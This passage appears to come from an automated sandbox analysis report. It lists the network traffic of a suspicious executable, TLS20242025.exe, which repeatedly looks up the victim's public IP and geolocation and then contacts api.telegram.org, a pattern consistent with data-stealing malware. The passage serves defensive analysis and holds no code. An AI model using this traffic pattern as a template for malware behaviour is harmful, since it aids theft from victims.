Sep 26, 2024 15:19:17.218261003 CEST	443	49734	149.154.167.220	192.168.2.6
Sep 26, 2024 15:19:17.218348026 CEST	443	49734	149.154.167.220	192.168.2.6
Sep 26, 2024 15:19:17.218393087 CEST	49734	443	192.168.2.6	149.154.167.220
Sep 26, 2024 15:19:17.223449945 CEST	49734	443	192.168.2.6	149.154.167.220
Sep 26, 2024 15:19:22.427514076 CEST	49717	80	192.168.2.6	193.122.130.0

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 15:19:05.630352974 CEST	56836	53	192.168.2.6	1.1.1.1
Sep 26, 2024 15:19:05.638216972 CEST	53	56836	1.1.1.1	192.168.2.6
Sep 26, 2024 15:19:06.967119932 CEST	49303	53	192.168.2.6	1.1.1.1
Sep 26, 2024 15:19:06.974488974 CEST	53	49303	1.1.1.1	192.168.2.6
Sep 26, 2024 15:19:16.180421114 CEST	53585	53	192.168.2.6	1.1.1.1
Sep 26, 2024 15:19:16.187434912 CEST	53	53585	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 15:19:05.630352974 CEST	192.168.2.6	1.1.1.1	0x7b8b	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 15:19:06.967119932 CEST	192.168.2.6	1.1.1.1	0x1759	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 15:19:16.180421114 CEST	192.168.2.6	1.1.1.1	0xfb17	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 15:19:05.638216972 CEST	1.1.1.1	192.168.2.6	0x7b8b	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 15:19:05.638216972 CEST	1.1.1.1	192.168.2.6	0x7b8b	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 15:19:05.638216972 CEST	1.1.1.1	192.168.2.6	0x7b8b	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 15:19:05.638216972 CEST	1.1.1.1	192.168.2.6	0x7b8b	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 15:19:05.638216972 CEST	1.1.1.1	192.168.2.6	0x7b8b	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 15:19:05.638216972 CEST	1.1.1.1	192.168.2.6	0x7b8b	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 15:19:06.974488974 CEST	1.1.1.1	192.168.2.6	0x1759	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 15:19:06.974488974 CEST	1.1.1.1	192.168.2.6	0x1759	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 15:19:16.187434912 CEST	1.1.1.1	192.168.2.6	0xfb17	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	193.122.130.0	80	5576	C:\Users\user\Desktop\TLS20242025.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:19:05.659281969 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 15:19:06.122944117 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:06 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0bcddeea9a7805c8e381fa665af7b383 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 15:19:06.166923046 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 15:19:06.640362978 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:06 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c23ce5d2c2a85db8a946edb5bd7a349d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 15:19:07.657269001 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 15:19:07.760487080 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:07 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2431fd51b921f24b6bb741ebe571ddf4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49717	193.122.130.0	80	5576	C:\Users\user\Desktop\TLS20242025.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:19:08.408338070 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 15:19:08.864907026 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:08 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c0b2429725f949ca32ac748a40974f93 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49719	193.122.130.0	80	5576	C:\Users\user\Desktop\TLS20242025.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:19:09.553265095 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 15:19:10.027354956 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:09 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 38ca7c2f7ebc57cb110af190f9cafb75 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49722	193.122.130.0	80	5576	C:\Users\user\Desktop\TLS20242025.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:19:10.652905941 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 15:19:11.118120909 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:11 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 550ad1ce73b9101620f1098956164895 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49725	193.122.130.0	80	5576	C:\Users\user\Desktop\TLS20242025.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:19:11.744726896 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 15:19:12.204050064 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8e9eb4992c8cf77aca17a7ca7bd412c8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49727	193.122.130.0	80	5576	C:\Users\user\Desktop\TLS20242025.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:19:12.837373972 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 15:19:13.314461946 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:13 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5df794ccc3050227ea5a1136b1788ea0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49729	193.122.130.0	80	5576	C:\Users\user\Desktop\TLS20242025.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:19:13.940435886 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 15:19:14.406107903 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2fcf826f586bf0a43dd8fe703b489b24 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49731	193.122.130.0	80	5576	C:\Users\user\Desktop\TLS20242025.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:19:15.035927057 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 15:19:15.511804104 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:15 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a3654867a6516020d112f6cf1a75780b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49713	188.114.97.3	443	5576	C:\Users\user\Desktop\TLS20242025.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 13:19:07 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 13:19:07 UTC	686	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:07 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 21579 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XTRRy9pqdvNda4OYtmPa2f7C6i%2Bb1EEvI0En0cUAfWwaNVWhZveBaLsF%2BkI%2BiaY4UJ%2Bb6z%2F%2FUum7fzY4x5JKw2Y%2F%2FCA1ucGZieT8hIx9u8Zc2xuwxBGczzfKdRyMHxr8CJFrWn8d"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c938b386ae58c9c-EWR
2024-09-26 13:19:07 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 13:19:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49715	188.114.97.3	443	5576	C:\Users\user\Desktop\TLS20242025.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 13:19:08 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 13:19:08 UTC	682	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:08 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 21580 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WvHeE%2B%2FaBdGooO24d0kOwGaK97GDt7mJ%2BEQRlx0C%2BuSAbNoMYPLmyIK6dCXVubzaPeItyp6Nu6CHPN1qauApuDjBBfkkJkH8z%2B5LGx0NZIDYDCtIvf79m9XWvVU748EPqWPy%2BxPh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c938b3d0c7642b1-EWR
2024-09-26 13:19:08 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 13:19:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49718	188.114.97.3	443	5576	C:\Users\user\Desktop\TLS20242025.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 13:19:09 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 13:19:09 UTC	686	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:09 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 21581 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SJbkNcUhR%2FnwGsP6tfeMsokYz1wHTf0EgR%2FMKlKIbCIFikAc%2F55R%2FGh3F7F7IDhodQ1dn%2FD3TsGsbezdtYQyoX6zUfHlt0a4aH9hJe91%2F4Yu%2BagtRo%2FlQup4cYi7w8u1ZRHJA6l7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c938b444c9e42e0-EWR
2024-09-26 13:19:09 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 13:19:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49720	188.114.97.3	443	5576	C:\Users\user\Desktop\TLS20242025.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 13:19:10 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 13:19:10 UTC	676	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:10 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 21582 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JKFsg3ZSbPsjlWJmqD6WbRlxlZ7FWfPojNsWZU%2F67xHVUajNSrFNH9RnuuFllV0QuHERR2uyLRpeH5mF6RHmff5UliulQAvZgQG2DRCLu9nYXYmE0cCXey%2B8ZG2uzNfkKhcDod%2Fh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c938b4b1bca8c81-EWR
2024-09-26 13:19:10 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 13:19:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49724	188.114.97.3	443	5576	C:\Users\user\Desktop\TLS20242025.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 13:19:11 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 13:19:11 UTC	674	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:11 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 21583 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qn0lnc%2B%2FxiQRV6xK67P4YWyAM94vv16GTTvgRrP5k1gG0nP5fzKFbEOQ2XG4aKmfy0pdIpWl7KrKfI92WPut9r3vzHn5IJHvG9cZBnvm9xA3bkfXp1EBu2q2mqAokGeTX0o1KGTH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c938b51f98443f2-EWR
